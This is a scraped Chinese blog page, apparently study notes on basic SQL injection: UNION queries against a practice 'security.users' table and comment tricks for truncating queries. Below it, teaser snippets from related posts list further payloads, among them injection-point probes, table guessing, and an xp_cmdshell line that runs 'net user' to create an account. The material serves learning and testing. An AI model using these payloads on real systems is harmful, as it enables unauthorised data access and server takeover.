SQL注入常用语句

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量2.3k 收藏 7
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42865859/article/details/85112070
版权
这篇博客详细介绍了SQL注入的各种常见语句,包括联合查询、注释方法、WHERE条件语句使用、空格替换、函数应用等,帮助理解SQL注入的原理和防范措施。还涉及到一些特殊注释符和函数如CHAR、CONCAT、SUBSTR、IF、GROUP_CONCAT等在SQL注入中的运用,以及如何通过十六进制转换和绕过MD5比较进行登录验证。
摘要由CSDN通过智能技术生成

接触到sql注入知识,做了一些常识,这里做一个完整的记录。

一,联合查询

联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。

select * from security.users where id=1 union select 1,2,3;


1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。

二,注释语句

sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。

1,#注释符

select * from security.users where id=1 union select 1,2,database()# limit 0,30;


此时后面的limit 0,30并没有生效。

2,--空格注释符 

select * from security.users where id=1 union select 1,2,database() -- ' limit 0,30;


注意在--后面有个空格,否则会报错,不过书写时可能疏忽,因此空格后一般写一个随机字符串。



3, ;/* 注释符

select * from security.users where id=1 union select 1,2,database() ;/* ' limit 0,1;


这个注释一定要注意 /前面有个;否则会报错


三,where条件语句使用

select * from security.users where id=1

最低0.47元/天 解锁文章
暴走灰太狼
关注
常用SQL注入语句
chengjingdeni的专栏
08-07 514
<br />     在对web应用进行渗透测试时,SQL注入无疑是最重要的检测项之一,下面就对常用SQL注入语句进行一个归纳总结,便于在进行渗透<br />测试时使用。<br />1.判断有无注入点<br />; and 1=1 and 1=2<br /><br />2.猜表一般的表的名称无非是admin adminuser user pass password 等..<br />and 0<>(select count(*) from *)<br />and 0<>(select count(*) f
常用Sql注入语句 常用Sql注入语句
09-28
常用Sql注入语句 常用Sql注入语句 常用Sql注入语句
SQL注入基础语句大全
热门推荐
Jeromeyoung
03-01 1万+
尽管语句很多,但是上手操作才是硬道理,话不多说直接进行SQL注入基础介绍。 原理:服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 一: 用户登陆判断语句: SELECT*FROMusersWHEREuser='uname'ANDpassword='pass' SELECT * FROM users WHE...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1614
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
sql注入--基本注入语句学习笔记
超人学飞的日子
05-31 1万+
接触到sql注入知识,做了一些常识,这里做一个完整的记录。一,联合查询联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。二,注释语句sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。1,#注释符此时后面的limit 0,30并没有生效。2,--空格注释符 注意在--后面有个空格,否则会报错,不...
SQL 注入有常用语句
weixin_34234721的博客
01-14 131
是否支持多句查询http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int-- 是否支持子查询http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])&gt;=0 返回用户名http://www.xxx.com/xxx...
sql注入语句大全
weixin_34239169的博客
03-31 337
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name passwo...
SQL Injection with MySQL
11-11 1449
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
SQL注入-常用函数和语句
ElsonHY的博客
11-21 912
文章目录前言0x01 常用函数0x02 常用语句总结 前言 SQL的函数很多,这里简单介绍一下在SQL注入中比较常用到的一些函数,如果你SQL学的不是很好,又想练一练SQL手工注入的话,可以优先学习这些函数和语句。 0x01 常用函数 system_user() 系统用户名 concat_ws()含有分隔符的链接字符串 user() 用户名 group_concat() 连接所有字符串并逗号分割 database() 数据库名 into outfile()写文件(有.
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
常用Sql注入语句.
03-30
NULL 博文链接:https://cn-wangwei.iteye.com/blog/1327507
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
SQL注入fuzz字典
02-28
sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。
手工SQL注入常用SQL语句
06-05
### 手工SQL注入常用SQL语句 #### 知识点概述 在现代网络环境中,随着业务系统的复杂度增加和技术的不断进步,安全问题日益受到重视。其中,SQL注入是一种常见的攻击方式,它通过将恶意SQL代码插入到应用程序的...
sql注入常用命令
09-18
### SQL注入常用命令详解 #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来控制数据库执行非授权操作。为了帮助初学者更好地理解和掌握SQL注入的基本原理及...
常用SQL注入语句大全
cainiao199020的博客
12-23 2757
1.判断有无注入点 整形参数判断 1、直接加’ 2、and 1=1 3、 and 1=2 如果1、3运行异常 2正常就存在注入 字符型判断 1、直接加’ 2、and ‘1’=‘1’ 3、 and ‘1’=‘2’ 搜索型: 关键字%’ and 1=1 and ‘%’=’% 关键字%’ and 1=2 and ‘%’=’% 如果1、3运行异常 2正常就存在注入 2.猜表一般的表的名称无非是admin ...
sql注入常用语句
EddieLancy的专栏
11-20 721
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(sele
SQL注入攻击常用语句详解
"手工注入常用SQL语句" SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意的SQL代码来操控后台数据库。以下是一些针对不同数据库系统的常见手工SQL注入语句: 1. **Access SQL注入**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值